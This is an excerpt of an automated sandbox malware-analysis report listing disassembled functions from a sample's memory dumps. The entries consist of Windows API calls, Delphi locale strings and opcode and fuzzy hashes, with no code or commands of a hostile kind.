                                                                                                                                  • Opcode ID: e8bcbd5276da79a5c2f76d385ea63728e8a48939d94f7c9a99f0559d72045b73
                                                                                                                                  • Instruction ID: f1ac4cea465b38ed2fec0694d470c749f3345514dcdad0c2473be078a5c6e8fc
                                                                                                                                  • Opcode Fuzzy Hash: e8bcbd5276da79a5c2f76d385ea63728e8a48939d94f7c9a99f0559d72045b73
                                                                                                                                  • Instruction Fuzzy Hash: F6416F7AD00A59BFDB10DEEACCC8AFEB3FEAF48208F1445A5A545D7201D770EA408B50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LoadString
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2948472770-0
                                                                                                                                  • Opcode ID: 7163c54551ce115ae2e0f6db87e25021bd4a95b59174a3b0f18429d70d1f8986
                                                                                                                                  • Instruction ID: f88b4203fb8e2a1fdbb92b4c3c2c69e68c9587b7d8952e8bad537efa9ae6a67b
                                                                                                                                  • Opcode Fuzzy Hash: 7163c54551ce115ae2e0f6db87e25021bd4a95b59174a3b0f18429d70d1f8986
                                                                                                                                  • Instruction Fuzzy Hash: 60026A75B24254EFEB50DFACCA84BAC77F4AB04315F1600E0E904AB2A6DB75BE40DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 041E5EF8
                                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 041E5F05
                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 041E5F0B
                                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 041E5F36
                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 041E5F7D
                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 041E5F8D
                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 041E5FB5
                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 041E5FC5
                                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 041E5FEB
                                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 041E5FFB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                  • API String ID: 1599918012-2375825460
                                                                                                                                  • Opcode ID: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
                                                                                                                                  • Instruction ID: 6cc3c0b4e7a52e50d3ed697c053f01cc09fd79f981947326313dba5fff362115
                                                                                                                                  • Opcode Fuzzy Hash: 45fc842c7ee497589fb0a595117f7bdcb306d77cf451f18dfb781db247336ba0
                                                                                                                                  • Instruction Fuzzy Hash: BA31B779E0065D39FB25D9F9CCC6FFE7BAD5B04344F8405E19104E6181D774AE448B50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • IsIconic.USER32(?), ref: 0422225B
                                                                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 04222278
                                                                                                                                  • GetWindowRect.USER32(?), ref: 04222291
                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 0422229F
                                                                                                                                  • GetWindowLongA.USER32(?,000000F8), ref: 042222B4
                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 042222C1
                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 042222CC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                                  • String ID: ,
                                                                                                                                  • API String ID: 2266315723-3772416878
                                                                                                                                  • Opcode ID: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
                                                                                                                                  • Instruction ID: a3a7e66ed2ee806cbca208711a6d7f4523a8c9902aa973be97b086ee3841ffaf
                                                                                                                                  • Opcode Fuzzy Hash: 11bc10056f08039989a3272d8451c8fa8ef77ab95f4f623aa4a2d6adde776a4c
                                                                                                                                  • Instruction Fuzzy Hash: ED11B275600711AFEB10DFADC9C4A9B77D8AF49314F044A65BE68DB396D732E800CB62
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SaveDC.GDI32(?), ref: 042140D0
                                                                                                                                  • RestoreDC.GDI32(?,?), ref: 04214144
                                                                                                                                  • GetWindowDC.USER32(?,00000000,04214334), ref: 042141BE
                                                                                                                                  • SaveDC.GDI32(?), ref: 042141F5
                                                                                                                                  • RestoreDC.GDI32(?,?), ref: 04214262
                                                                                                                                  • DefWindowProcA.USER32(?,?,?,?,00000000,04214334), ref: 04214316
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: RestoreSaveWindow$Proc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1975259465-0
                                                                                                                                  • Opcode ID: f67e05821bd963aed480277344e29e36f6ba376f388858ddcaf5f6bf7af2011d
                                                                                                                                  • Instruction ID: b01a9322f47b5f90776b9417569323d96de7dc50c9a7715bb9c60515d337f0f7
                                                                                                                                  • Opcode Fuzzy Hash: f67e05821bd963aed480277344e29e36f6ba376f388858ddcaf5f6bf7af2011d
                                                                                                                                  • Instruction Fuzzy Hash: 06E12974B1060A9FEB10EF69C8809AEF7F5FF68314B2586A5E904A7260D774FD41CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: RestoreSave$FocusWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1553564791-0
                                                                                                                                  • Opcode ID: 86bd510873e61b5bc4de8d7c59a08a86fb9a52c1ee43b66f7784ae2a74cd5dda
                                                                                                                                  • Instruction ID: 8f5818dc71b38d5d0d25ee39d1bfd92e3d1076ad26ef4c65b5ca6615b5120afd
                                                                                                                                  • Opcode Fuzzy Hash: 86bd510873e61b5bc4de8d7c59a08a86fb9a52c1ee43b66f7784ae2a74cd5dda
                                                                                                                                  • Instruction Fuzzy Hash: EFC17C31B20125EFDB11DF6AC689ABEB7F5EB49304F1544A1E804AB2A0DB30FE41DB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • IsIconic.USER32(?), ref: 04233998
                                                                                                                                  • SetActiveWindow.USER32(?,?,?,?,04233392,00000000,04233866), ref: 042339A9
                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 042339CC
                                                                                                                                  • DefWindowProcA.USER32(?,00000112,0000F120,00000000,00000000,?,?,?,?,04233392,00000000,04233866), ref: 042339E5
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,?,?,04233392,00000000,04233866), ref: 04233A2B
                                                                                                                                  • SetFocus.USER32(00000000,?,00000000,00000000,?,?,04233392,00000000,04233866), ref: 04233A79
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ActiveEnabledFocusIconicProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 848842217-0
                                                                                                                                  • Opcode ID: 2910b53872a8078e633c70364d23161e29436252dca00d09635fd31b195f9591
                                                                                                                                  • Instruction ID: 69c08366f3d4af342ef29c2d3394238e7af8f892d078bf373819fb39c988584c
                                                                                                                                  • Opcode Fuzzy Hash: 2910b53872a8078e633c70364d23161e29436252dca00d09635fd31b195f9591
                                                                                                                                  • Instruction Fuzzy Hash: 483119B1720241ABFB24EF69CDC5B6937B8AF0470AF0814A1AE44DF2D6D7B5F9848714
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • IsIconic.USER32(?), ref: 0422195F
                                                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 0422197D
                                                                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 042219B3
                                                                                                                                  • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 042219D7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Placement$Iconic
                                                                                                                                  • String ID: ,
                                                                                                                                  • API String ID: 568898626-3772416878
                                                                                                                                  • Opcode ID: e2cec1a54e07971b93f925069750258acd49cbfa2f7c93dd395129310c2fb0b5
                                                                                                                                  • Instruction ID: 17885eccd97867d3502e4daa6855f6dab2c249b1e1e9d6769fcea3000d5eea6a
                                                                                                                                  • Opcode Fuzzy Hash: e2cec1a54e07971b93f925069750258acd49cbfa2f7c93dd395129310c2fb0b5
                                                                                                                                  • Instruction Fuzzy Hash: ED215C71710224ABDF14EF69C9C09AA77A8AF09314F008465FE18DF206D772F904CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • IsIconic.USER32(?), ref: 042338D3
                                                                                                                                  • SetActiveWindow.USER32(?,?,?,04233385,00000000,04233866), ref: 042338EB
                                                                                                                                    • Part of subcall function 04232F58: EnumWindows.USER32(Function_00052EE8,00000000), ref: 04232F82
                                                                                                                                    • Part of subcall function 04232F58: ShowOwnedPopups.USER32(00000000,?), ref: 04232FB1
                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 04233917
                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,04233385,00000000,04233866), ref: 0423394A
                                                                                                                                  • DefWindowProcA.USER32(?,00000112,0000F020,00000000,?,00000000,00000000,00000000,?,00000000,00000040,00000000,?,?,?,04233385), ref: 0423395F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ActiveEnabledEnumIconicOwnedPopupsProcShowWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2995439034-0
                                                                                                                                  • Opcode ID: b0676c7339367519e0a01872b215eba6086a352b12c103765656a25fd8002925
                                                                                                                                  • Instruction ID: 187d6f393418455311651944aafb13bdab5935af92249cfa528dcbe3aae5930c
                                                                                                                                  • Opcode Fuzzy Hash: b0676c7339367519e0a01872b215eba6086a352b12c103765656a25fd8002925
                                                                                                                                  • Instruction Fuzzy Hash: 8011FEB07206419BEB64EF6DCEC5F5537A86F04309F4800A4BE14DF19AD775F9408714
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc
                                                                                                                                  • String ID: MonitorFromWindow
                                                                                                                                  • API String ID: 190572456-2842599566
                                                                                                                                  • Opcode ID: 0ce0643778b7b5796c5b5423184f63cc329f3c54202591f10bdf7ad158a55e71
                                                                                                                                  • Instruction ID: 614ec94657455ca47daaf3d5036fc6c685cf928c2faf10221e9e7af427c6c2a6
                                                                                                                                  • Opcode Fuzzy Hash: 0ce0643778b7b5796c5b5423184f63cc329f3c54202591f10bdf7ad158a55e71
                                                                                                                                  • Instruction Fuzzy Hash: AB01A972B206185BAB14EE949C849FF73DCDF15264BC48021F811A72C2DB79BD41D7A1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • FindResourceA.KERNEL32(?,?,?), ref: 041FA293
                                                                                                                                  • LoadResource.KERNEL32(?,041FA318,?,?,?,041F5D70,?,00000001,00000000,?,041FA1BE,00000000,?), ref: 041FA2AD
                                                                                                                                  • SizeofResource.KERNEL32(?,041FA318,?,041FA318,?,?,?,041F5D70,?,00000001,00000000,?,041FA1BE,00000000,?), ref: 041FA2C7
                                                                                                                                  • LockResource.KERNEL32(041F9E88,00000000,?,041FA318,?,041FA318,?,?,?,041F5D70,?,00000001,00000000,?,041FA1BE,00000000), ref: 041FA2D1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                  • Opcode ID: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
                                                                                                                                  • Instruction ID: 31df8f65a51434ef5a13e37f8a7c7d5fd4593cf4e45dedb2cf2a074ca4a6a795
                                                                                                                                  • Opcode Fuzzy Hash: 28e7e119e039b25beda35739a3405b35bb29ee27f4b5ad7a1bbed113ed856bf2
                                                                                                                                  • Instruction Fuzzy Hash: EEF04BB66046046F6748EFADACC0D6B73ECEE982A4350405AFA0CCB205DB35ED028364
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $c
                                                                                                                                  • API String ID: 0-3797896886
                                                                                                                                  • Opcode ID: 7e70446f2f04736b70a214ab031c3aa6bebdc213c1cd19f391bef6f9c6eef634
                                                                                                                                  • Instruction ID: 3c23d9e2dfb25bd1a898700b818da1d677a065931936196ac356c6f5f964f18f
                                                                                                                                  • Opcode Fuzzy Hash: 7e70446f2f04736b70a214ab031c3aa6bebdc213c1cd19f391bef6f9c6eef634
                                                                                                                                  • Instruction Fuzzy Hash: 3523F270B20205AFEB31EF64CC84BBE77B5AF85704F048458E949672A0DBB4B984DB65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 04232468
                                                                                                                                  • GetCursorPos.USER32(?), ref: 04232485
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 042324A5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentCursorObjectSingleThreadWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1359611202-0
                                                                                                                                  • Opcode ID: c6e9ed8daa6d604e6c51445ec91ad4f0070d7930f4a8aa56f4d42c32e5e812fa
                                                                                                                                  • Instruction ID: 06966e33c4ebf228b819771221898b03c93bcc6c4e43faafe89986ad5a7be197
                                                                                                                                  • Opcode Fuzzy Hash: c6e9ed8daa6d604e6c51445ec91ad4f0070d7930f4a8aa56f4d42c32e5e812fa
                                                                                                                                  • Instruction Fuzzy Hash: 14F082B1724209DBFB24FB59E8C9B9D73F8EB10316F8001E29210971D1EB79B484C625
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ($($(((
                                                                                                                                  • API String ID: 0-2102698497
                                                                                                                                  • Opcode ID: 17cbe7189b4058751cc5e2aaa9f1919b841a36666ba3f5afc1cc8d035a58d977
                                                                                                                                  • Instruction ID: 5565d9faf48656dd6a3eced264bc32a67cbc5486af150f677ad37fb6329dc71e
                                                                                                                                  • Opcode Fuzzy Hash: 17cbe7189b4058751cc5e2aaa9f1919b841a36666ba3f5afc1cc8d035a58d977
                                                                                                                                  • Instruction Fuzzy Hash: 40E10670B24115EFEB08EE29CC80B7E77A6DFC5314F14C229E816E72D5DA70A981C7A1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $@
                                                                                                                                  • API String ID: 0-1077428164
                                                                                                                                  • Opcode ID: 062dd7f236da494e309082285e52ea3f476cbb1f75b51689bf49ea5e4b7e8a26
                                                                                                                                  • Instruction ID: 510e9e268c95c29e1ed578f6479b065561658adf982de2fc89be277d0ceb4caa
                                                                                                                                  • Opcode Fuzzy Hash: 062dd7f236da494e309082285e52ea3f476cbb1f75b51689bf49ea5e4b7e8a26
                                                                                                                                  • Instruction Fuzzy Hash: 0E724970730706AAFB22BF64CD8AFBE3A95AF45304F044165FD42A90F1DBB47581C669
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetMessagePos.USER32 ref: 0421F14F
                                                                                                                                  • GetKeyboardState.USER32(?,?,?,?,0421F6C4), ref: 0421F24C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: KeyboardMessageState
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3083355189-0
                                                                                                                                  • Opcode ID: 9a109fd4098c8cc38e517da96156ca9f784df6a54854a0791d71768ddeba3bee
                                                                                                                                  • Instruction ID: 61acc93d7e581fffb6bb9e2a7182e9c789187530384cc171bcee382e30531b8f
                                                                                                                                  • Opcode Fuzzy Hash: 9a109fd4098c8cc38e517da96156ca9f784df6a54854a0791d71768ddeba3bee
                                                                                                                                  • Instruction Fuzzy Hash: B631C2793287418BD324DF78C68579FBBD4ABA9314F014A2DE5A8C7260EB74E900C757
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CaptureIconic
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2277910766-0
